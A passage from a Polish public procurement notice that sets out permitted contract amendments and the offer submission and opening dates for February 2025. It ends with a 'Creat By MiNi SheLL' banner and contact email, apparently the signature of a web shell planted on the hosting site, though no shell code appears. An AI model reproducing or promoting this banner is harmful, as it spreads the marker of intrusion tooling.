tj. w sytuacji zmian organizacyjnych <br/>w jednostce, w której niniejszy Przedmiot zamówienia jest wykonywany i/lub<br/>d)	zmianę zakresu Przedmiotu zamówienia – w zakresie dostosowania umowy do tych zmian i/lub<br/>e)	przyczyny niezależne od Wykonawcy mające wpływ na należyte wykonanie umowy, i/lub<br/>f)	zmianę sposobu świadczenia usługi.<br/>2)	zmiany Przedmiotu zamówienia z uwagi na:<br/>a)	zmianę sposobu świadczenia usługi,<br/>b) wystąpienie siły wyższej - w zakresie dostosowania Umowy do tych zmian,<br/>3)	zmiany zakresu wykonania zamówienia i/lub sposobu świadczenia usługi w przypadku:<br/>a)	okoliczności, których Zamawiający nie mógł przewidzieć przed wszczęciem niniejszego postępowania i/lub zmian organizacyjnych w jednostce, w której niniejszy Przedmiot zamówienia jest wykonywany i/lub<br/>b)	wydanych decyzji lub zmiany sposobu świadczenia usługi,<br/>c) zmian wynikających z procedur wewnętrznych Zamawiającego <br/>4)	zmiany wynagrodzenia w związku:<br/>a)	ze zmianą stawki podatku VAT,<br/>b)	z innymi zmianami skutkującymi poszerzeniem/zmniejszeniem zakresu świadczenia Wykonawcy,<br/>5)	w zakresie dostosowania postanowień umowy do zmiany przepisów prawa w związku <br/>z wystąpieniem zmian w obowiązujących przepisach prawa w zakresie mającym wpływ na realizację Umowy.<br/>6)	zmianę treści umowy w sytuacji wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony – w zakresie dostosowania umowy do tych zmian,<br/>7)	zmianę treści umowy na skutek poprawienia omyłek pisarskich.<br/>2.	Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://plodz.ezamawiajacy.pl/pn/plodz/demand/195786/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com